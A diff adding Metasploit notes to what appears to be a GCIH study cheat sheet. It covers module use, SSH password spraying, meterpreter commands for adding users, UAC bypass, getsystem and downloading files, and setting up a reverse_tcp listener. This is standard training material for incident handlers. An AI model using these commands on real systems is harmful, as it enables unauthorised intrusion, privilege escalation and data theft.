hunty-dumpy/cheat-sheets/GCIH-CC.md

 - Version Scan `-sV` for version will do more tests to get what service name. server, etc is running. (includded in -A command)

 ## Metasploit
 Practice searching for payload and exploits inside of metasploit: `search type:exploit psexec`
+- To load a module (exploit, auxiliary, paylaod, etc) `use <module name or ID from search results>`
+- To show information about loaded module `show info` or just `info`
+- To  only show the parameters of the loaded module `options`
+- To set a parameter value `set PARAM value`
+- To unser a parameter value `unset PARAM value`
+  - Common Parameters
+    - RHOSTS remote host, ussually the target
+    - LHOST  local host, ussually your attacker machine.
+You can use `set LHOST eth0` to auto complete the IP of your eth0 interface
+    - LPORT local port
+    - RPORT  remote port
+    - PAYLOAD  payload (where applicable) do
+    - SESSION (for exploit that will be run on/through an existing meterpreter session, e.g, a persistence mechanism)

+- To send an existing meterpreter session to the background `backround` or `bg`. * note the session number displayed
+- To list existing sessions `sesssions`
+- To resume a backgrounded session `sessions -i#` (?)
+- To run or exploit a targer using the loaded module `run` or `exploit`
+- Routing traffic through a meterpreter session `route add <ip> <mask> <session number>`  all following traffic includding port scans toward CIDR in range will be forwarded through that meterpreter session.
+  - To show existing routes use `route` for help `route -h`

+### Example Auxiliary Modules
+- Port scan:
+  - `use auxiliary/scanner/portscan/tcp`
+  - `set RHOSTS <CIDR or CSV>`
+  - `set PORTS <ran-ge or CSV>`
+  - run
+- HTTP Recon
+  - `use auxiliary/scanner/http/http_header`
+  - `set RHOSTS <CIDR or CSV>`
+  - `run`
+- ssh password spary
+  - `use scanner/ssh/ssh_login`
+  - `unset PASSWORD`
+  - `set PASS_FILE /path/to/passfile.txt`
+  - `run`

+### Meterpreter:
+  - To start a system shell `shell`
+  - To get system info and the architecture that meterpreter is running on `sysinfo`
+  - To execute a system command  `execute -f <command>` to run the same command interactively (show output) `execute -if <command>` e.g., `execute -if net user /add <user> <password>`
+  - To search for files on the system `search -f *.txt`
+  - To elevate privileges of existing session:
+    - To migrate to a different process in the systeme `migrate -N <process name>` or `sessions -i <session number> -C "migrate -N <process name>"`.
+      - some exploits/modules need to run on processes of certain architecture (X86 x64) check current architecture of meterpreter session by running ` `
+    - Use a priviledge elevation exploit like a UAC bypass e.g., `exploit/windows/local/bypassuac_injection`
+    - Try `getsystem` to get local system privs
+  - To download/retrieve a file from the remote system `download file/path/loot.fl`
+  - Upload file to target `upload /local/file/path /dest/file.path`
+  - list running processes `ps`

+### Setting up listeners
+- For payloads or persistence that will call back to the attack host and if needed choose to deliver a payload when connection is established:
+  - `use exploit\multi\handler`
+    - set a payload (optional) `set payload windows/meterpreter/reverse_tcp`
+    - `set lhost <your ip>`
+    - `run` and wait for connection back

 ## volatility